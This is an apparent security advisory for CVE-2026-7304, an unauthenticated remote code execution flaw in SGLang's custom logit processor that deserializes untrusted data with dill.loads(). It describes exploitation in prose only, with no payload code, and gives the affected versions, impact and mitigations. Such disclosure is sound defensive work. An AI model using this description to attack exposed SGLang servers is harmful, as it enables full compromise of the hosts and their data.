CVE-2026-7304

Vulnerability

CVE-2026-7304 is an unauthenticated remote code execution vulnerability in SGLang's multimodal generation runtime. The bug resides in the custom logit processor feature, which deserializes Python objects using dill.loads() without any validation. This occurs when the --enable-custom-logit-processor option is enabled, which is off by default but recommended in SGLang's documentation for serving DeepSeek-R1 and GLM-4 [1]. Affected versions are SGLang v0.4.1.post7 and later [1].

Exploitation

An unauthenticated attacker needs only network access to the generation endpoint. The --enable-custom-logit-processor flag must be set on the server. The attacker crafts a malicious serialized Python object (using tools like dill or pickle) that executes arbitrary system commands upon deserialization. Sending this payload to the exposed generation endpoint triggers dill.loads() on the untrusted data, executing the embedded code [1].

Impact

Successful exploitation yields full remote code execution on the host running SGLang with the privileges of the SGLang process. This leads to complete compromise of confidentiality, integrity, and availability of the server and any data it handles. The CVSS v3.1 score is 9.8 (Critical) [1].

Mitigation

As of the publication date (2026-05-18), no official patch is available. The vendor did not respond during coordinated disclosure with CERT/CC (case VU#777338) [1]. Until a fix is released, the only mitigation is to avoid enabling the --enable-custom-logit-processor flag. If the feature is required, restrict network access to the generation endpoint to trusted hosts only [1].